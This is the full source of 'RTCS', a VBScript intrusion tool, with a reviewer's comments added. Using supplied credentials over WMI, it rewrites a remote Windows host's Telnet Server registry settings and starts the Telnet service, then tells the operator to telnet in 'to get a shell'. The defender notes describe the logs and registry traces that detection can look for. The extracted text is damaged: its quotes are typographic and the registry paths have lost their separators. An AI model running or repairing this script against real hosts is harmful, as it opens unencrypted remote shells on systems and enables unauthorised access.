' RTCS: reconfigures and toggles the Telnet service on a remote Windows host over WMI.
' NOTE(review): as extracted, this listing uses typographic quotes and its path strings
' have lost their separators, so it is a record of the tool's logic rather than a
' runnable file.
'
' Runtime errors are suppressed for the whole script; the only explicit err.number
' check is the one made right after the first ConnectServer call.
on error resume next
' If started under the GUI host (wscript.exe), relaunch under cscript in a console
' window and exit. Only the script path is passed on, not the original arguments,
' so the relaunched copy reaches the argument-count check with none.
if (lcase(right(wscript.fullname,11))=”wscript.exe”) then
set objShell=wscript.createObject(“wscript.shell”)
objShell.Run(“cmd.exe /k cscript //nologo “&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
' Argument handling: exactly five positional arguments are read (extra ones are ignored).
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if
' Positional arguments: target address, account name, password, NTLM mode, Telnet port.
' Defender note: the account password is passed in clear text on the command line, so
' it is captured by any process-creation logging that records command lines.
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
' A literal pair of double quotes as the password argument is mapped to NULL.
if password=chr(34)&chr(34) then password=NULL
' Only 0, 1 or 2 are accepted for the NTLM setting.
' NOTE(review): ntlm is still the raw argument string here and port is never validated;
' both are later written to the registry as DWORD values.
if ntlm<0 or ntlm>2 then
usage()
wscript.echo “The value of NTML is wrong.”
wscript.quit
end if
' The banner is printed unconditionally before any remote action.
usage()
' Phase 1: connect to the target's default WMI namespace with the supplied credentials
' and rewrite two Telnet Server registry values through the StdRegProv class.
' Defender note: this shows up as a remote WMI logon for the supplied account, followed
' by registry writes made by the WMI provider host on the target rather than by an
' interactive process.
wscript.echo “Conneting “&ipaddress&”….”
set objlocator=createobject(“wbemscripting.swbemlocator”)
set objswbemservices=objlocator.connectserver(ipaddress,”root/default”,username,password)
' The only place err.number is inspected; a failed connection ends the script here.
showerror(err.number)
wscript.echo “Setting NTLM=”&ntlm&”….”
' Build the input parameters for StdRegProv.SetDWORDValue.
' Failures in Get/Methods_/SpawnInstance_ are not checked individually (errors are
' suppressed script-wide); only the ExecMethod_ return value is tested.
set objinstance=objswbemservices.get(“stdregprov”)
set objmethod=objinstance.methods_(“SetDWORDvalue”)
set objinparam=objmethod.inparameters.spawninstance_()
' &h80000002 is the HKEY_LOCAL_MACHINE hive.
objinparam.hdefkey=&h80000002
' Telnet Server 1.0 settings key under HKLM\SOFTWARE (path separators are missing in
' this listing). Writes to the NTLM and TelnetPort values of that key are the registry
' artefacts to monitor.
objinparam.ssubkeyname=”SOFTWAREMicrosoftTelnetServer1.0″
objinparam.svaluename=”NTLM”
' presumably selects the Telnet Server authentication mode (0-2) - confirm against
' the Telnet Server documentation.
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_(“SetDWORDvalue”,objinparam)
showerror(objoutparam.returnvalue)
wscript.echo “Setting port=”&port&”….”
' Same key and parameter object are reused; only the value name and data change.
objinparam.svaluename=”TelnetPort”
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_(“SetDWORDvalue”,objinparam)
showerror(objoutparam.returnvalue)
' Phase 2: reconnect to the CIM namespace, look up the Telnet service (tlntsvr) and
' toggle it. The result of this second ConnectServer call is not checked.
' Defender note: on the target this produces Service Control Manager events for the
' Telnet service (start type changed, service started or stopped) shortly after the
' remote WMI logon. Telnet carries credentials and session data unencrypted, so an
' unexpected enablement of this service is worth alerting on.
wscript.echo “Querying state of telnet server….”
set objswbemservices=objlocator.connectserver(ipaddress,”rootcimv2″,username,password)
set colinstances=objswbemservices.execquery(“select * from win32_service where name=’tlntsvr'”)
for each objinstance in colinstances
' A disabled service cannot be started, so its start mode is first changed to Manual.
if objinstance.startmode=”Disabled” then
wscript.echo “Telnet server has been disabled. Now changeing start mode to manual….”
set objmethod=objinstance.methods_(“changestartmode”)
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode=”Manual”
set objoutparam=objinstance.execmethod_(“changestartmode”,objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo “Changeing state….”
' Toggle: a running service is stopped, a stopped one is started. showerror ends the
' script on a non-zero return, so the success messages print only for a zero result.
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo “Target telnet server has been STOP Successfully.”
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo “Target telnet server has been START Successfully!”
wscript.echo “Now, you can try: telnet “&ipaddress&” “&port&”, to get a shell.”
end if
next
' showerror: reports the outcome of the previous step and aborts on failure.
'   errornumber - a status code (err.number or a WMI method return value);
'                 zero is treated as success.
' Prints "Error!" and terminates the whole script on any non-zero value, otherwise
' prints "OK!". The numeric code itself is never shown, and no value is returned.
function showerror(errornumber)
if errornumber<>0 then
wscript.echo “Error!”
wscript.quit
else
wscript.echo “OK!”
end if
end function
' usage: prints the tool banner and the expected command line. Takes no arguments and
' returns nothing.
' The five placeholders in the usage line map, in order, to the arguments the script
' reads: target address, account name, password, NTLM mode, Telnet port.
' The banner strings ("RTCS v1.08", "Remote Telnet Configure Script") are fixed text,
' which makes them usable as content signatures when hunting for copies of this script.
function usage()
wscript.echo “************************************************************************”
wscript.echo “RTCS v1.08”
wscript.echo “Remote Telnet Configure Script, by zzzevazzz”
wscript.echo “Welcome to visite [url=http://www.isgrey.com]www.isgrey.com[/url]”
wscript.echo “Usage:”
wscript.echo “cscript “&wscript.scriptfullname&” targetIP username password NTLMAuthor telnetport”
wscript.echo “It will auto change state of target telnet server.”
wscript.echo “************************************************************************”
end function